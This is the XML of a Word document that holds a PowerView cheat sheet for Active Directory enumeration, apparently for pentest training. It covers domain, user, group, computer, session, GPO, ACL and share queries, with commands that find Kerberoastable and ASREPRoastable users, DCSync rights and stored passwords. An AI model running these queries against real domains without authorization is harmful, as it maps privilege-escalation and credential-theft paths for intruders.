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18CF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</w:pPr>
      <w:r w:rsidRPr="00B448C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  <w:t>Quick enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191AC4CF" w14:textId="6DD1C339" w:rsidR="00B448C1" w:rsidRPr="00B448C1" w:rsidRDefault="00B448C1" w:rsidP="00B448C1">
      <w:pPr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NetDomain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#Basic domain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info</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="32FCF824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#User info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC846BC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UACFilter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NOT_ACCOUNTDISABLE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samaccountname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description,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pwdlastset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logoncount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badpwdcount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#Basic user enabled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info</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="774E62F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LDAPFilter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'(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sidHistory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=*)' #Find users with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sidHistory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set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1537F20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PreauthNotRequired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#ASREPRoastable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users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1E4BDA7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-SPN #Kerberoastable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users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5F08F9B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#Groups info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7660F6A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NetGroup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samaccountname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admincount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description</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="00E3A40A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DomainObjectAcl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SearchBase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'CN=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AdminSDHolder,CN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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System,DC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=EGOTISTICAL-BANK,DC=local' | %{ $_.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SecurityIdentifier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} | Convert-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SidToName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AdminSDHolders</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3818C3D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#Computers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291CD48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NetComputer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samaccountname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operatingsystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5212662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NetComputer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Unconstrainusered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samaccountname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#DCs always appear but aren't useful for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privesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="26E5027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NetComputer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TrustedToAuth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samaccountname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#Find computers with Constrained Delegation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9B659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DomainGroup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AdminCount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DomainGroupMember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-Recurse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| ?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{$_.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MemberName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-like '*$'} #Find any machine accounts in privileged groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7695491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#Shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5820EAA4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Find-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DomainShare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CheckShareAccess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#Search readable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shares</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="01D66AED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#Domain trusts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D0B54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NetDomainTrust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all domain trusts (parent, children and external)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C8357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NetForestDomain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NetDomainTrust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#Enumerate all the trusts of all the domains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found</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="79B74B86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#LHF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D9504A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#Check if any user passwords are set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E9DD0F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$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FormatEnumerationLimit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=-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1;Get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-DomainUser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LDAPFilter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'(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userPassword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=*)' -Properties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samaccountname,memberof,userPassword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% {Add-Member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InputObject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$_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NoteProperty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'Password' "$([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System.Text.Encoding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]::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ASCII.GetString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($_.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userPassword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))"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PassThru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} |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fl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="44D2487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#Asks DC for all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computers, and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asks every compute if it has admin access (very noisy). You need RCP and SMB ports opened.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5231CF2C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Find-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LocalAdminAccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5BE5A6B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#Get members from Domain Admins (default) and a list of computers and check if any of the users is logged in any machine running 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NetSession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/Get-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>NetLoggedon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on each host. If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Checkaccess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then it also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check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for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LocalAdmin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access in the hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1438E11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Invoke-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UserHunter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CheckAccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="652014C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#Find interesting ACLs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACB20CB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Invoke-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ACLScanner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ResolveGUIDs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IdentityReferenceName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ObjectDN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ActiveDirectoryRights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fl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7DB5CC2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</w:pPr>
      <w:r w:rsidRPr="00B448C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  <w:t>Domain info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D154CB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Domain Info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAE92AA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Get-Domain #Get info about the current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</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="263D4FF6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NetDomain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info about the current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</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="19315FCB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NetDomain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-Domain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mydomain.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1634B6E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DomainSID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domain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SID</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7F5992A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A5D2A74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Policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533266C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DomainPolicy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info about the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policy</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4F9CBFF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(Get-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DomainPolicy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)."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KerberosPolicy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" #Kerberos tickets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info(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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MaxServiceAge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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7C8BD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(Get-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DomainPolicy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)."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SystemAccess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" #Password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policy</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="040DAAA6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DomainPolicyData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select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ExpandProperty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SystemAccess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#Same as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previous</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1B58593B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(Get-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DomainPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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PrivilegeRights</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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#Check your privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2763E56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DomainPolicyData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 Same as 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DomainPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3E6395E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D7991D6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Domain Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDC81F5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DomainController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select Forest, Domain,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IPAddress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Name,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OSVersion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 Get specific info of current domain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controller</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="257244DC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NetDomainController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-Domain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mydomain.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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all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ifo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of specific domain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Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC86FE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3790146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# Get Forest info </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1432C1E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ForestDomain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7A45B533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</w:pPr>
      <w:r w:rsidRPr="00B448C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  <w:t>Users, Groups, Computers &amp; OUs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0120ADE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Users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBD3B0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## Get usernames and their groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8F7FBF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-Properties name,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MemberOf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fl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7F24AAC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## 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and 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are kind of the same</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB7D5A7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users with several (not all)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properties</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="738C4733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samaccountname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description,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pwdlastset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logoncount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badpwdcount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#List all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usernames</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6794601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student107 #Get info about a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</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="423665C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-properties name, description #Get all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descriptions</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3BEBA24B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-properties name,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pwdlastset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logoncount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badpwdcount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#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Get all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pwdlastset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logoncount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and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badpwdcount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="59BDDBA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Find-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UserField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-SearchField Description -SearchTerm "built" #Search account with "something" in a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parameter</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="63A08FA6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# Get users with reversible encryption (PWD in clear text with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dcsync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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B3C86B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-Identity *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| ?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{$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useraccountcontrol</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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-like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select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samaccountname,useraccountcontrol</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="091C870B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675602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Users Filters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF58F2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UACFilter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NOT_ACCOUNTDISABLE -properties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distinguishedname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#All enabled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users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0A80C73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UACFilter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ACCOUNTDISABLE #All disabled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users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="09678E4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UACFilter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SMARTCARD_REQUIRED #Users that require a smart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card</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="64CA18F3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UACFilter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NOT_SMARTCARD_REQUIRED -Properties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samaccountname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#Not smart card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users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="382C165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LDAPFilter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'(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sidHistory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=*)' #Find users with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sidHistory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set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E61EF4F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PreauthNotRequired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#ASREPRoastable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users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5E266C2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-SPN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serviceprincipalname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#Kerberoastable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users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="03103F2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-SPN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| ?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{$_.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memberof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-match 'Domain Admins'} #Domain admins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kerberostable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2153A857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TrustedToAuth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userprincipalname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name,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msds-allowedtodelegateto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#Constrained Resource Delegation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216DDE0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AllowDelegation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AdminCount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#All privileged users that aren't marked as sensitive/not for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delegation</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0EEBD43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# retrieve *most* users who can perform DC replication for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dev.testlab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.local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(i.e.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DCsync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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083A014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ObjectAcl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"dc=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dev,dc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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testlab,dc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=local"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ResolveGUIDs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? {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344ECCF7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   ($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ObjectType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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-match 'replication-get') -or ($_.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ActiveDirectoryRights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-match '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GenericAll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')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E19FBF7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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E4239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# Users with PASSWD_NOTREQD set in the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userAccountControl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means that the user is not subject to the current password policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C35870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>## Users with this flag might have empty passwords (if allowed) or shorter passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8931F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UACFilter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PASSWD_NOTREQD | Select-Object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samaccountname,useraccountcontrol</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="564DB8B3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EB3962C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#Groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A950C7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DomainGroup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where Name -like "*Admin*" | select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SamAccountName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="530B51FF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## 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DomainGroup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is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similar to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NetGroup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</w:p>
    <w:p w14:paraId="745582A5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NetGroup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groups</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0F81DA1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NetGroup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-Domain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mydomain.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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groups of an specific domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0397AE33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NetGroup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'Domain Admins' #Get all data of a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group</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6D027CD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NetGroup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AdminCount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select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name,memberof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,admincount,member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#Search admin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grups</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="137C4BA7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NetGroup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"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myusername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" #Get groups of a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</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="226F0FC6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NetGroupMember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-Identity "Administrators" -Recurse #Get users inside "Administrators" group. If there are groups inside of this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grup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the -Recurse option will print the users inside the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others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groups also</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BCEB0F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NetGroupMember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-Identity "Enterprise Admins" -Domain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mydomain.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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#Remember that "Enterprise Admins" group only exists in the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rootdomain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of the forest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9266E7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NetLocalGroup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ComputerName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dc.mydomain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.local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ListGroups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Local groups of a machine (you need admin rights in no DC hosts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E829E8F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NetLocalGroupMember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computername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dcorp-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dc.dollarcorp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.moneycorp.local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users of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localgroups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in computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6409AA7D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DomainObjectAcl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SearchBase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'CN=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AdminSDHolder,CN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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System,DC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testlab,DC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=local'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ResolveGUIDs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#Check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AdminSDHolder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users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DE75B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DomainObjectACL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ResolveGUIDs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-Identity *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| ?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{$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SecurityIdentifier</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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-eq $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sid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} #Get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ObjectACLs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by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sid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2E57EF4A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NetGPOGroup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restricted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groups</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7E83A79F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BC2726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Computers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAAB135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DomainComputer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-Properties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DnsHostName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 Get all domain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maes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of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computers</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="685CFA0B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## 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DomainComputer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is kind of the same as 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NetComputer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="51F1764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NetComputer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all computer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objects</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3752519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NetComputer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-Ping #Send a ping to check if the computers are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working</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6C0FD2C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NetComputer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-Unconstrained #DCs always appear but aren't useful for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privesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="36154753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NetComputer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TrustedToAuth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#Find computers with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Constrined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Delegation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695E15E3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DomainGroup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AdminCount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DomainGroupMember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-Recurse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| ?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{$_.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MemberName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-like '*$'} #Find any machine accounts in privileged groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597AA464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10184F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#OU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4257D6FF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DomainOU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-Properties Name | sort -Property Name #Get names of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OUs</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3EDFBC7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DomainOU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"Servers" |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%{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DomainComputer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SearchBase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$_.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distinguishedname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-Properties Name} #Get all computers inside an OU (Servers in this case)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284F0F0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## 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DomainOU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is kind of the same as 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NetOU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7C0076E7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NetOU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Organization Units</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DE635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NetOU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StudentMachines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%{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NetComputer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ADSPath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$_} #Get all computers inside an OU (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StudentMachines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in this case)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46950DB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</w:pPr>
      <w:r w:rsidRPr="00B448C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  <w:t>Logon and Sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415F2D17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NetLoggedon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ComputerName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&lt;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servername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&gt; #Get net logon users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at the moment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in a computer (need admins rights on target)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B51A5D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NetSession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ComputerName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&lt;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servername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&gt; #Get active sessions on the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host</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="06551FAD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LoggedOnLocal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ComputerName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&lt;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servername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&gt; #Get locally logon users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at the moment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(need remote registry (default in server OS))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AACE43A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LastLoggedon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ComputerName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&lt;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servername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&gt; #Get last user logged on (needs admin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rigths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in host)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BC3746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NetRDPSession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ComputerName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&lt;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servername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&gt; #List RDP sessions inside a host (needs admin rights in host)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A146BB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</w:pPr>
      <w:r w:rsidRPr="00B448C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  <w:t>Group Policy Object - GPOs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A49CF60" w14:textId="77777777" w:rsidR="00B448C1" w:rsidRPr="00B448C1" w:rsidRDefault="00B448C1" w:rsidP="00B448C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es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B448C1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Si un atacante tiene altos privilegios sobre un GPO, podría abusar de él agregando permisos a un usuario, agregando un usuario administrador local a un host o creando una tarea programada (inmediata) para realizar una acción.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E75F5F3" w14:textId="77777777" w:rsidR="00B448C1" w:rsidRPr="00B448C1" w:rsidRDefault="00B448C1" w:rsidP="00B448C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es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B448C1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Para obtener más información al respecto y cómo abusar de él, siga este enlace.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125A62E4" w14:textId="7C0628B9" w:rsidR="00B448C1" w:rsidRPr="00B448C1" w:rsidRDefault="00B448C1" w:rsidP="00B448C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30907FB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#GPO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3280AD35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DomainGPO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displayName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#Check the names for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info</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0D818B4C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NetGPO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all policies with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details</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3DC98933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NetGPO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displayname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the names of the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policies</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="77A131E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NetGPO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ComputerName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&lt;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servername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&gt; #Get the policy applied in a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computer</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7E047CF3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gpresult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/V #Get current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policy</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0D3A773B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6FCDD24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Get who can create new GPOs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBC653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DomainObjectAcl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SearchBase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"CN=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Policies,CN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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System,DC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dev,DC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invented,DC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=io"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ResolveGUIDs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?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{ $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ObjectAceType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-eq "Group-Policy-Container" }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ObjectDN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ActiveDirectoryRights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SecurityIdentifier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fl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3F842FEC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D2F4015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Enumerate permissions for GPOs where users with RIDs of &gt; 1000 have some kind of modification/control rights</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BA4D2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DomainObjectAcl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LDAPFilter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'(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objectCategory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groupPolicyContainer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)'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| ?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{ (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$_.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SecurityIdentifier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-match '^S-1-5-.*-[1-9]\d{3,}$') -and ($_.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ActiveDirectoryRights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-match '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WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner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')}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ObjectDN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ActiveDirectoryRights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SecurityIdentifier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fl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0E2FB89A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7C9AC15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Get permissions a user/group has over any GPO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDB8E0C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$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sid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=Convert-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NameToSid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"Domain Users"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E55C3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DomainGPO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ObjectAcl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| ?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{$_.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SecurityIdentifier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-eq $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sid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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350EAB2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EC7D70D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#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COnvert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GPO GUID to name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2391BAD5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Get-GPO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Guid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18E5A689-E67F-90B2-1953-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198ED4A7F532</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="28B93E3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593BC35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Transform SID to name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA8385C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ConvertFrom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-SID S-1-5-21-3263068140-2042698922-2891547269-1126</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23870BF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EE30E53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Get GPO of an OU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A948D7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NetGPO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GPOName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'{3E04167E-C2B6-4A9A-8FB7-C811158DC97C}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745C2CE7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F33A11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Returns all GPOs that modify local group memberships through Restricted Groups or Group Policy Preferences.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB7BCE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DomainGPOLocalGroup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GPODisplayName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GroupName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GPOType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="05D6EA0D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0DD991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Enumerates the machines where a specific domain user/group is a member of a specific local group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7045D85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DomainGPOUserLocalGroupMapping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LocalGroup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Administrators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ObjectName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GPODisplayName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ContainerName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ComputerName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4288B60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B448C1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Learn how to </w:t>
      </w:r>
      <w:r w:rsidRPr="00B448C1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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>exploit permissions over GPOs and ACLs</w:t>
      </w:r>
      <w:r w:rsidRPr="00B448C1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in:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BB13B7" w14:textId="77777777" w:rsidR="00B448C1" w:rsidRPr="00B448C1" w:rsidRDefault="00B448C1" w:rsidP="00B448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proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00B448C1">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:cap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PAGE</w:t>
        </w:r>
        <w:r w:rsidRPr="00B448C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Abusing</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="00B448C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Active Directory ACLs/ACEs</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="50F014AB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</w:pPr>
      <w:r w:rsidRPr="00B448C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  <w:t>ACL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658D963A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#Get ACLs of an object (permissions of other objects over the indicated one)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C91B7F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ObjectAcl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SamAccountName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&lt;username&gt; -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ResolveGUIDs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5530843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14E25B3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#Other way to get ACLs of an object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E09226F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$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sid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= Convert-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NameToSid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&lt;username/group&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7AF76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DomainObjectACL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ResolveGUIDs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-Identity *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| ?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{$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SecurityIdentifier</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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-eq $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sid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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B732195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ADC3D4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#Get permissions of a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E269E36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PathAcl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-Path "\\dc.mydomain.local\sysvol"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A904F1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D3603AA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#Find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intresting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ACEs (Interesting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permisions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of "unexpected objects" (RID&gt;1000 and modify permissions) over other objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3744FC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Find-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InterestingDomainAcl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ResolveGUIDs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2F5E422D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E1D8EE4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#Check if any of the interesting permissions founds is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realated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to a username/group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFF92CC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Find-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InterestingDomainAcl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ResolveGUIDs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| ?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{$_.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IdentityReference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-match "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RDPUsers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"} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAF916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368CD9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#Get special rights over All administrators in domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A4F3A7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NetGroupMember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GroupName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"Administrators" -Recurse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| ?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{$_.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IsGroup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-match "false"} | %{Get-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ObjectACL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SamAccountName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$_.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MemberName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ResolveGUIDs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}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ObjectDN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IdentityReference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ActiveDirectoryRights</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="01240B9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</w:pPr>
      <w:r w:rsidRPr="00B448C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  <w:t>Shared files and folders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDC4823" w14:textId="77777777" w:rsidR="00B448C1" w:rsidRPr="00B448C1" w:rsidRDefault="00B448C1" w:rsidP="00B448C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B448C1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C842BA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NetFileServer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#Search file servers. Lot of users use to be logged in this kind of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servers</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="74B4C0F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Find-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DomainShare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CheckShareAccess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#Search readable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shares</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
